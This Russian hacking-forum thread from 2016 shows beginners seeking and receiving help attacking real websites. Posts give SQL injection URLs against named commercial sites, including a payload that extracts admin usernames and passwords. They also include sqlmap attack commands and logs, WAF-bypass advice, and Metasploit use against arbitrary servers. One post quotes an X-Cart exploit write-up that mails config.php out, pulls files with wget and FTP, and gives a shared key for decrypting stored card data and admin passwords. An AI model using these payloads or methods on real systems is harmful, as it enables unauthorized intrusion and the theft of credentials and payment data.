с --technique=EU не крутит, --level=5 --risk=3 тоже не крутит, ХАВИДЖИ раскручивает эту уязвимость, sqlmap не может(
либо я дурак либо лыжи правда не едут....
уязвимость раскручивается точно знаю, только как?(
Можно попробовать обойти ваф набором тамперов.
https://github.com/sqlmapproject/sqlmap/tree/master/waf
kacergei
02.09.2016, 20:52
Часто стал натыкаться на сайтах на "Защиту от роботов" в основном рекапча
её как то можно обойти?
Даже если через сторонний сервис чекать, то как автоматизировать с тем же к примеру sqlmap
Кручу уязвимость:
Code:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%27%22&_a=viewCat_new
раскручиваю через --dbms=MySQL --risk=3
но чет какая то лажа выходит(
http://image.prntscr.com/image/9920341ac6954b439e29eb10166fa3bf.png
реально ли такое раскрутить?
BabaDook
02.09.2016, 23:02
r1l said:
↑ (https://antichat.live/posts/3987305/)
Кручу уязвимость:
Code:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%27%22&_a=viewCat_new
раскручиваю через --dbms=MySQL --risk=3
но чет какая то лажа выходит(
http://image.prntscr.com/image/9920341ac6954b439e29eb10166fa3bf.png
реально ли такое раскрутить?
PHP:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new
допустим реально. Там W.A.F. Крутите.
BabaDook said:
↑ (https://antichat.live/posts/3987314/)
PHP:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new
допустим реально. Там W.A.F. Крутите.
у меня два вопроса, я начинающий)
Что значит waf?
крутить так же --dbms=MySQL ?
BabaDook
02.09.2016, 23:11
r1l said:
↑ (https://antichat.live/posts/3987319/)
у меня два вопроса, я начинающий)
Что значит waf?
крутить так же --dbms=MySQL ?
веб апликатион фаерволл
Да, да крутите, используя тамперы, просто так его sqlmap не раскрутит, ищите для этого другой сайт. У вас 2 варианта: 1)задрочить тампер скрипты. 2) крутить руками. Гуглить sql wafbypass. итд
Не как не могу раскрутить SQL njection через POST запрос в авторизацию
.SpoilerTarget" type="button">Spoiler: Фото
http://s8.hostingkartinok.com/uploads/images/2016/09/4c1ef788f669cace5a9643139d27c939.png
http://s8.hostingkartinok.com/uploads/images/2016/09/6894fb18ce57b639eba5e8c8b9131410.png
.SpoilerTarget" type="button">Spoiler: Отчёт
Code:
POST /dokument/full-manual/developers/admin/js/?errauth=blocked_30_min HTTP/1.1
Content-Length:
Content-Type: application/x-www-form-urlencoded
Referer: http://www.site.ru:80/
Cookie: SESSdc0003b8d793c3d72e49c242aa69e1d4=i8hjlikb619hf ca2bb9e62qr56; _ym_uid=1472824047791009073; _ym_isad=2; _ym_visorc_2170150=w
Host: www.site.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms
.SpoilerTarget" type="button">Spoiler: Отчёт от мампа
Code:
sqlmap -u www.site.ru/dokument/full-manual/developers/admin/js/?errauth=blocked_30_min --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --dbs --level=2 --risk=2 --string --tamper=space2comment
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
_ -| . | | | .'| . |
___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applic
le local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
*] starting at 17:04:23
17:04:23] [INFO] testing connection to the target URL
qlmap got a 302 redirect to 'http://www.site.ru:80/BASE_PATH_HREF?errauth=blocked_30_min'. Do you want to follow? [Y/n] Y
edirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
17:04:42] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
17:04:42] [INFO] testing if the provided string is within the target URL page content
17:04:42] [WARNING] you provided '--tamper=space2comment' as the string to match, but such a string is not within the target URL raw response, sqlmap will
arry on anyway
17:04:43] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable
17:04:44] [INFO] testing for SQL injection on POST parameter 'name'
17:04:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
17:05:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
17:05:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
17:05:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
17:05:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
17:05:37] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
17:05:41] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
17:05:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
17:05:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
17:05:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
17:06:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
17:06:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
17:06:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
17:06:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
17:06:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
17:06:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
17:06:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
17:07:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
17:07:09] [INFO] testing 'PostgreSQL error-based - Parameter replace'
17:07:09] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
17:07:10] [INFO] testing 'MySQL inline queries'
17:07:11] [INFO] testing 'PostgreSQL inline queries'
17:07:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
17:07:12] [INFO] testing 'Oracle inline queries'
17:07:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
17:07:27] [INFO] POST parameter 'name' appears to be 'MySQL > 5.0.11 stacked queries' injectable
t looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
or the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] n
17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
17:08:51] [INFO] testing 'MySQL = 5.0.12 RLIKE time-based blind'
17:08:52] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
17:08:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
17:08:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
17:09:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
17:09:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
17:09:33] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
17:09:46] [INFO] checking if the injection point on POST parameter 'name' is a false positive
17:09:47] [WARNING] false positive or unexploitable injection point detected
17:09:47] [WARNING] POST parameter 'name' is not injectable
17:09:47] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try
o rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect t
t there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
*] shutting down at 17:09:47
Помогите пожалуйста очень надо
Sensoft said:
↑ (https://antichat.live/posts/3987343/)
Не как не могу раскрутить SQL njection через POST запрос в авторизацию
Spoiler: Фото
http://s8.hostingkartinok.com/uploads/images/2016/09/4c1ef788f669cace5a9643139d27c939.png
http://s8.hostingkartinok.com/uploads/images/2016/09/6894fb18ce57b639eba5e8c8b9131410.png
Spoiler: Отчёт
Code:
POST /dokument/full-manual/developers/admin/js/?errauth=blocked_30_min HTTP/1.1
Content-Length:
Content-Type: application/x-www-form-urlencoded
Referer: http://www.site.ru:80/
Cookie: SESSdc0003b8d793c3d72e49c242aa69e1d4=i8hjlikb619hf ca2bb9e62qr56; _ym_uid=1472824047791009073; _ym_isad=2; _ym_visorc_2170150=w
Host: www.site.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms
Spoiler: Отчёт от мампа
Code:
sqlmap -u www.site.ru/dokument/full-manual/developers/admin/js/?errauth=blocked_30_min --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --dbs --level=2 --risk=2 --string --tamper=space2comment
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
_ -| . | | | .'| . |
___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applic
le local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
*] starting at 17:04:23
17:04:23] [INFO] testing connection to the target URL
qlmap got a 302 redirect to 'http://www.site.ru:80/BASE_PATH_HREF?errauth=blocked_30_min'. Do you want to follow? [Y/n] Y
edirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
17:04:42] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
17:04:42] [INFO] testing if the provided string is within the target URL page content
17:04:42] [WARNING] you provided '--tamper=space2comment' as the string to match, but such a string is not within the target URL raw response, sqlmap will
arry on anyway
17:04:43] [WARNING] heuristic (basic) test shows that POST parameter 'name' might not be injectable
17:04:44] [INFO] testing for SQL injection on POST parameter 'name'
17:04:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
17:05:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
17:05:18] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
17:05:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
17:05:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
17:05:37] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
17:05:41] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
17:05:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
17:05:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
17:05:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
17:06:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
17:06:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
17:06:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
17:06:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
17:06:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
17:06:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
17:06:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
17:07:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
17:07:09] [INFO] testing 'PostgreSQL error-based - Parameter replace'
17:07:09] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
17:07:10] [INFO] testing 'MySQL inline queries'
17:07:11] [INFO] testing 'PostgreSQL inline queries'
17:07:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
17:07:12] [INFO] testing 'Oracle inline queries'
17:07:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
17:07:27] [INFO] POST parameter 'name' appears to be 'MySQL > 5.0.11 stacked queries' injectable
t looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
or the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] n
17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
17:08:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
17:08:51] [INFO] testing 'MySQL = 5.0.12 RLIKE time-based blind'
17:08:52] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
17:08:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
17:08:52] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
17:09:06] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
17:09:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
17:09:33] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
17:09:46] [INFO] checking if the injection point on POST parameter 'name' is a false positive
17:09:47] [WARNING] false positive or unexploitable injection point detected
17:09:47] [WARNING] POST parameter 'name' is not injectable
17:09:47] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try
o rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect t
t there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
*] shutting down at 17:09:47
Помогите пожалуйста очень надо
WAF
pw0ned said:
↑ (https://antichat.live/posts/3987359/)
WAF
Ка обойти?
Sensoft said:
↑ (https://antichat.live/posts/3987395/)
Ка обойти?
Выше кидал ссылку на набор тамперов, пробуй задрачивать
pw0ned said:
↑ (https://antichat.live/posts/3987435/)
Выше кидал ссылку на набор тамперов, пробуй задрачивать
А как через них херачить ?
Sensoft said:
↑ (https://antichat.live/posts/3987439/)
А как через них херачить ?
--tamper=name
не легче оставить ссылку на ресурс ?
pw0ned said:
↑ (https://antichat.live/posts/3987444/)
--tamper=name
не легче оставить ссылку на ресурс ?
У тебя есть скайп ?
pw0ned said:
↑ (https://antichat.live/posts/3987444/)
--tamper=name
не легче оставить ссылку на ресурс ?
в лс глянь
pw0ned said:
↑ (https://antichat.live/posts/3987444/)
--tamper=name
не легче оставить ссылку на ресурс ?
А на счёт тампера я сделал так --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init __.py файл подписал инпут расширение поставил внутрь засунул скрипт но идёт ошибка
Code:
[13:58:10] [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script 'C:\Users\Aleksandr\Desktop\Scriptwaf\__init__.py'
А вод полный запрос
Code:
sqlmap -u www.site.ru/ --data="action=auth&name=%5c&pass=g00dPa%24%24w0rD&url=cms" -p name --tamper=C:\Users\Aleksandr\Desktop\Scriptwaf\__init __.py --dbs
winstrool
03.09.2016, 17:24
BabaDook said:
↑ (https://antichat.live/posts/3987314/)
PHP:
http://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1)+group+by+1,2,3,4,5,6+--+-&_a=viewCat_new
допустим реально. Там W.A.F. Крутите.
r1l said:
↑ (https://antichat.live/posts/3987319/)
у меня два вопроса, я начинающий)
Что значит waf?
крутить так же --dbms=MySQL ?
_ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select(co ncat(username,0x3a,password))from(CubeCart_admin_u sers)limit+0,1))))
winstrool said:
↑ (https://antichat.live/posts/3987484/)
_ttp://asia-fashion-wholesale.com/welcome/index.php?asday=2016-5-5&catId=1%20or(ExtractValue(1,concat(0x3a,(select(co ncat(username,0x3a,password))from(CubeCart_admin_u sers)limit+0,1))))
http://image.prntscr.com/image/0a83fe27b25d4cf488cf73babe98d6be.png
не фурычит
BabaDook
03.09.2016, 18:16
r1l said:
↑ (https://antichat.live/posts/3987486/)
http://image.prntscr.com/image/0a83fe27b25d4cf488cf73babe98d6be.png
не фурычит
Попробуйте всё таки браузером обработать сылку
BabaDook said:
↑ (https://antichat.live/posts/3987510/)
Попробуйте всё таки браузером обработать сылку
еслиб я умел(
очень много сайтов раскручивает подбором по символов, как с этим бороться?(
r1l said:
↑ (https://antichat.live/posts/3987624/)
очень много сайтов раскручивает подбором по символов, как с этим бороться?(
Видимо никто не понял вопроса.. Я в том числе
хелп
не раскручивает(
крутил как --dbms=MySQL --level=5 --risk=3 --random-agent
уязвимость точно есть, но не могу раскрутить(
Code:
http://www.fckladionica.com:80/allnews.php?page=%5c&rc=497
pw0ned said:
↑ (https://antichat.live/posts/3987761/)
Видимо никто не понял вопроса.. Я в том числе
Он имеет введу слепую иньекцию
r1l said:
↑ (https://antichat.live/posts/3987825/)
хелп
не раскручивает(
крутил как --dbms=MySQL --level=5 --risk=3 --random-agent
уязвимость точно есть, но не могу раскрутить(
Code:
http://www.fckladionica.com:80/allnews.php?page=%5c&rc=497
Чувак там кажись WAF, это тот ещё геморой
r1l said:
↑ (https://antichat.live/posts/3987624/)
очень много сайтов раскручивает подбором по символов, как с этим бороться?(
Софтом крути - не парься
Zen1T21 said:
↑ (https://antichat.live/posts/3987851/)
Софтом крути - не парься
Запара в том, если сервер слабый ты можешь ждать месяцами чтобы он все столбцы вывел )
Sensoft said:
↑ (https://antichat.live/posts/3987841/)
Чувак там кажись WAF, это тот ещё геморой
Не геморой, если умеешь обходить
pw0ned said:
↑ (https://antichat.live/posts/3987855/)
Не геморой, если умеешь обходить
обход сложный?
pw0ned said:
↑ (https://antichat.live/posts/3987855/)
Не геморой, если умеешь обходить
я могу кинуть тебе дыру с waf на POST запросе где не достаток фильтрации на логине и ты хер станешь обходить потому что надо думать и плюс на это надо время
Sensoft said:
↑ (https://antichat.live/posts/3987862/)
я могу кинуть тебе дыру с waf на POST запросе где не достаток фильтрации на логине и ты хер станешь обходить потому что надо думать и плюс на это надо время
А почему я вообще что-то должен делать по твоему желанию ?
Обходят теми же тамперами. Есть .pdf от PTSecurity по поводу обхода, гугли.
pw0ned said:
↑ (https://antichat.live/posts/3987863/)
А почему я вообще что-то должен делать по твоему желанию ?
Обходят теми же тамперами. Есть .pdf от PTSecurity по поводу обхода, гугли.
Во первых я тебя не заставляю, я гуглил там инфа 2007 года
Просто когда ты прошаренный и тебе когда то кто то помог то теперь тебе кажется что это всё легко
Sensoft said:
↑ (https://antichat.live/posts/3987866/)
Во первых я тебя не заставляю, я гуглил там инфа 2007 года
Просто когда ты прошаренный и тебе когда то кто то помог то теперь тебе кажется что это всё легко
Я и не говорю что ты "заставляешь".
Если 2007 года значит полезной уже не считаеться ? Слоупок.. боже
pw0ned said:
↑ (https://antichat.live/posts/3987868/)
Я и не говорю что ты "заставляешь".
Если 2007 года значит полезной уже не считаеться ? Слоупок.. боже
Типа waf стоит на месте и не развивается ? Все эти обходы так же присутствуют в havij и мампе
Просто havij устаревшая программа
Опять же в чём проблема быстро покидать ссылки на темы где это нормально объясняется ?
Просто я вот смотрю в этой теме почти не помогают, оч редко когда доступно объяснят
Sensoft said:
↑ (https://antichat.live/posts/3987869/)
Типа waf стоит на месте и не развивается ? Все эти обходы так же присутствуют в havij и мампе
Просто havij устаревшая программа
Опять же в чём проблема быстро покидать ссылки на темы где это нормально объясняется ?
Просто я вот смотрю в этой теме почти не помогают, оч редко когда доступно объяснят
Не вижу ничего сложного, загуглить "обход waf" и перейти по первой ссылке с PTsecurity.
Обходят теми же тамперами, 100 раз уже об этом говорилось.
pw0ned said:
↑ (https://antichat.live/posts/3987870/)
Не вижу ничего сложного, загуглить "обход waf" и перейти по первой ссылке с PTsecurity.
Обходят теми же тамперами, 100 раз уже об этом говорилось.
Вот опять же на счёт тамперов, ты мне указал на запрос в мампе, я не против но смотри я так понял нужно указать путь до файла я всё сделал и расширение поставил и путь верно указал и вроде даже файл правильно назвал но у меня ошибка я указал это здесь, мне хер кто ответил, хоть я уверен допустил я глупую ошибку и указать на неё секундно
pw0ned (https://antichat.live/members/280248/),короче в папке уже лежат скрипты и тупа надо указать название файлов, так ?
Чем опасна регистрация на WP сайте(регистрация именно через WP сайта) ?
Могу постить посты на сайте . WP 4.6 .
кто умеет обходить WAF? Ну или по пытается хотя бы, есть очень хороший прибыльный варик
это плохо?
http://image.prntscr.com/image/5c7908991d86479aa18bf77483a4ec1e.png
http://image.prntscr.com/image/68d2834b24d548159d30d7018f1bd43d.png
BabaDook
06.09.2016, 15:32
SaNDER said:
↑ (https://antichat.live/posts/3988363/)
Чем опасна регистрация на WP сайте(регистрация именно через WP сайта) ?
Могу постить посты на сайте . WP 4.6 .
Вопрос странно написан, регистрация чем она может быть опасна? Скорее всего опасны действия после реге. Думаю можно боятся коментариев с подгрузкой чего либо. Так или иначе рега не опасна . Хз как ответить на вопрос
nmap + metasploit
Ребят используя эти программы можно взломать любой комп, сервер у которого открытые порты и на те проги есть эксплоиты ?
А то я читал типа это только по локалке ломать только свой же комп или по wi-fi
Так что взлом произайдёт только если я на локалке ?
1. Не любой.
2. Жертва может находится где угодно.
3. Зачем ломать себя?
4/ В разделе Статьи (https://antichat.live/forums/30/)много разжеванной информации с повседневными вопросами
Ch3ck said:
↑ (https://antichat.live/posts/3989225/)
1. Не любой.
2. Жертва может находится где угодно.
3. Зачем ломать себя?
4/ В разделе
Статьи (https://antichat.live/forums/30/)
много разжеванной информации с повседневными вопросами
Смотри просканировал сайт на порты, там много открытых было, там был порт 80 версия программы, я вёл поиск на Apache httpd 2.2.22 ((Debian)) вывело херову тучу я взял самым высоким риском excellent, прописал всё и вёл exploit потом вывело это
И мне интересно я подключился ?
Code:
Started reverse TCP handler on 192.168.1.4:4444
Exploit completed, but no session was created.
msf exploit(struts_dev_mode) >
Я подключился к тому серверу или нет ?
Ничего не произошло, он же тебе пишет. Вряд ли кто с такой постановкой вопроса тебе ответит.
Sensoft said:
↑ (https://antichat.live/posts/3989237/)
Смотри просканировал сайт на порты, там много открытых было, там был порт 80 версия программы, я вёл поиск на Apache httpd 2.2.22 ((Debian)) вывело херову тучу я взял самым высоким риском excellent, прописал всё и вёл exploit потом вывело это
И мне интересно я подключился ?
Code:
Started reverse TCP handler on 192.168.1.4:4444
Exploit completed, but no session was created.
msf exploit(struts_dev_mode) >
Я подключился к тому серверу или нет ?
Написано же что сеанс не был создан.
Не подключился ты никуда..
Как в PentestBox открыть Metasploit Framework не консольно а интерфейсом ?
В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе
Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
r1l said:
↑ (https://antichat.live/posts/3988381/)
кто умеет обходить WAF? Ну или по пытается хотя бы, есть очень хороший прибыльный варик
это плохо?
http://image.prntscr.com/image/5c7908991d86479aa18bf77483a4ec1e.png
http://image.prntscr.com/image/68d2834b24d548159d30d7018f1bd43d.png
Погугли обход WAF.Но я думаю,что там не просто нужно использовать стандартные обходы,но и самому конструировать запросы . Кстати это плохо.)
Sensoft said:
↑ (https://antichat.live/posts/3989370/)
В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе
Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
Скачай Armitage .
SaNDER said:
↑ (https://antichat.live/posts/3989528/)
Скачай Armitage .
Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
подскажите пожалуйста что есть на x-cart 4.1.9 Pro
Sensoft said:
↑ (https://antichat.live/posts/3989551/)
И не хера не говорят как на винду поставить шикарно
В чём проблема скачай Linux.Пусть будет и Windows,и Linux .
EstGi said:
↑ (https://antichat.live/posts/3989573/)
подскажите пожалуйста что есть на x-cart 4.1.9 Pro
Цитирую:
.SpoilerTarget" type="button">Spoiler
При установке X-Cart требует наличия exec() и выключенного сейфмода для работы скриптов обработки картона. Сам картон и пароли пользователей зашифрованы алгоритмом blowfish и хранятся в БД; ключ blowfish хранится в config.php вместе с настройками для подключения к БД.
После целенаправленного поиска всех вызовов exec(), был обнаружен незащищенный скрипт, который не фильтрует поступающие данные, попадающие в exec().
payment/cc_basia.php:
PHP:
if($REQUEST_METHOD == "POST" && isset($HTTP_POST_VARS["boamsg"]) && empty($HTTP_POST_VARS["boaref"]))
{ x_load('order');
$pp_path = func_query_first_cell("SELECT param02 FROM $sql_tbl[ccprocessors] WHERE processor='cc_basia.php'"); $resp = parse_basia_response($HTTP_POST_VARS["boamsg"]); /* ... */ }
PHP:
function parse_basia_response($resp)
{
global $pp_path; exec(func_shellquote($pp_path)."/decrypt ".$resp." 2>&1";,$out); $resp = $out[0]; /* ... */ }
Вывода exec() получить нельзя, но команды успешно выполняются.
Эксплоит работает в интерактивном режиме, поэтому нужен CLI-интерфейс. Первый параметр URL, второй - режим работы. Всего сделал 4 режима:
[LIST]
ch/check - проверка доступности exec() через вывод некоторых параметров конфигурации PHP в скрипте check_requirements.php с GET-параметром checkrequirements. В большинстве случаев, если путь указан верно, exec() будет доступен.
e/exec - выполнение команд. Здесь надо отметить, что в команде не допускаются символы, которые могут быть заэкранированы addslashes(). Это также особо не препятствует удачному взлому.
c/config - отправка config.php на email. Эксплоит запросит ваш email и выполнит такую команду:
cat ../config.php | mail $email
u/upload - загрузка файлов с помощью wget. Будут запрошены URL удаленного файла, а также локальный путь для сохранения. Локальный путь нужно указывать относительно папки, где установлен X-Cart. Его можно не указывать, тогда будет использоваться файл skin1/main/error_realtime_shipping_disabled.php. По завершени выполнения команды будет предложено применить touch на созданном файле.
Если файлы не закачиваются, то вероятно wget'а нет или к нему запрещен доступ. Самый верный вариант - заливать с помощью ftp. Для этого запускаем второй режим и выполняем команду:
cd ../skin1/main/; echo user [user] [pass]>ftp.txt; echo prompt>>ftp.txt; echo get s.php>>ftp.txt; echo bye>>ftp.txt; ftp -n -v [host] mdecrypt('06a907f395516c9dfb4489e7de21d50141fabf5b 9b007787', 'bb3704bed294be6d89b840b3fc184039');
blowfish.php - это отредактированный скрипт из поставки X-Cart (см. в атаче); первый аргумент функции это зашифрованное значение, второй - ключ. Кстати на всех сайтах, которые мне попадались - ключ был один и тот же: bb3704bed294be6d89b840b3fc184039. Пароли админов расшифровываются аналогичным способом.
Sensoft said:
↑ (https://antichat.live/posts/3989544/)
Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
Linux как вторую ОС не вариант поставить ?..
pw0ned said:
↑ (https://antichat.live/posts/3989804/)
Linux как вторую ОС не вариант поставить ?..
уже всё, разобрался во всём
trololoman96
12.09.2016, 11:33
Когда то давно видел пример запросов в иньекции с использованием group_concat() и использованием чего то по сути похожего на лимит, выдирая инфу по блокам последовательно. Воспроизвести самому не вышло и найти не смог, не подскажите ?
Sensoft said:
↑ (https://antichat.live/posts/3989212/)
nmap + metasploit
Ребят используя эти программы можно взломать любой комп, сервер у которого открытые порты и на те проги есть эксплоиты ?
А то я читал типа это только по локалке ломать только свой же комп или по wi-fi
Так что взлом произайдёт только если я на локалке ?
Если ты задашь сей вопрос рано тебе еще использовать такие тулзы. Если ты выйдешь за NAT, т.е. белый айпишник купишь, то можешь использовать метасплоит на что угодно. Взломать можно не всё.
Sensoft said:
↑ (https://antichat.live/posts/3989370/)
В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе
Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
Раньше была db_autopwn команда, но в новой версии её вырубили, а как её вернуть читай тут. И да, армитаж гавно.
ЛИНК (http://www.thecurrent.ru/entry/vozvrashchaem-db-autopwn-v-metasploit-4-x.html)
r1l said:
↑ (https://antichat.live/posts/3987858/)
обход сложный?
Если не знаешь полезных нагрузок по WAF BYPASS, то либо читай статью Бертони ТУТ (https://antichat.live/threads/425295/), Либо включай поочереди тамперы как уже говорили (ключ --tamper) в SQLMAP
SooLFaa said:
↑ (https://antichat.live/posts/3990498/)
Раньше была db_autopwn команда, но в новой версии её вырубили, а как её вернуть читай тут. И да, армитаж гавно.
ЛИНК (http://www.thecurrent.ru/entry/vozvrashchaem-db-autopwn-v-metasploit-4-x.html)
Armitage для начала сойдёт .
SaNDER said:
↑ (https://antichat.live/posts/3990615/)
Armitage для начала сойдёт .
По мне так очень тупой гуишник для скрипткиди. Любая из трех книг по метасплоиту даст куда больше профита чем тупое использование армитажа. Но это мое ИМХО.
BabaDook
16.09.2016, 16:43
man crunch
crunch --help
DezMond™
21.09.2016, 23:03
